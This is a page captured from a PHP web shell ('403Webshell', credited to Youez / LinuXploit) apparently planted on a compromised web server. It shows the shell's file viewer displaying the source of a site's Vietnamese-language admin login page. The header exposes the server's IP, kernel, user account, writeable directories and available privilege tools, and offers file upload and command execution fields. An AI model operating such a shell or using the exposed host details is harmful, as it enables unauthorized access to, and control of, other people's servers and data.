403Webshell
Server IP : 103.48.194.25  /  Your IP : 216.73.217.33
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33
System : Linux VMHostDefault 3.10.0-1160.42.2.el7.x86_64 #1 SMP Tue Sep 7 14:49:57 UTC 2021 x86_64
User : sieuthimay ( 1016)
PHP Version : 8.2.20
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/pundarikanail.com-bk/wadmin/components/login/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/pundarikanail.com-bk/wadmin/components/login/views/index.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> 
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="description" content="">
    <meta name="keywords" content="">
    <title><?=lang('login');?></title>
    <link rel="stylesheet" type="text/css" href="<?=skin?>css/login.css">
    <link rel="stylesheet" type="text/css" href="<?=skin?>css/system.css">
</head>
<body>
    <? if($this->session->userdata('user_group') >=24){redirect(base_url().'admincp');} ?>
    <div id="wrapper">  
        <div id="body_login">
				<div style="text-align:center; color:#F00; font-weight:bold;">
				<?
                if($this->session->userdata('message')){
                    echo $this->session->userdata('message');
                }
                ?></div>
            <div id="content">
            <?=form_open(uri_string())?>
            <table width="400" cellpadding="5" bordercolor="#C0C0C0" border="1" style="border-collapse: collapse" id="table1">
                <tbody>
                    <tr>
                        <td style="padding-left:0px; padding-bottom:Opx; padding-right:0px; padding-top:0px" class="row1" colspan="2">
                        <img width="400" height="50" border="0" src="<?=skin?>images/login.gif"></td>
                    </tr>
                    <tr>
                        <td width="117" class="label">Thành viên : </td>
                        <td width="259" class="login"><input type="text" size="25" name="user_login" id="user_login" value=""></td>
                    </tr>
                    <tr>
                        <td width="117" class="label">Mật khẩu : </td>
                        <td class="login"><input type="password" size="25" name="user_pass" value="" id="user_pass"></td>
                    </tr>
                    <tr style="display:none">
                        <td width="117" class="label">Captcha :</td>
                        <td class="login"><input type="text" style="width:80px;" name="captcha" value="" id="captcha">
                        <span><img src="<?=site?>login/captcha" width="75" height="26" style="margin: 0px 82px 0 5px; float: right;" /></span></td>
                    </tr>
                    <tr>
                        <td width="117" class="row1">&nbsp;</td>
                        <td class="buttom"><input type="submit" name="bt_submit" class="buttom" value="Đăng nhập">
                        <input type="reset" name="B2" class="buttom" value="Hủy bỏ"></td>
                    </tr>
                </tbody>
             </table>
            <?=form_close()?>
            </div>
        </div>
    </div>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit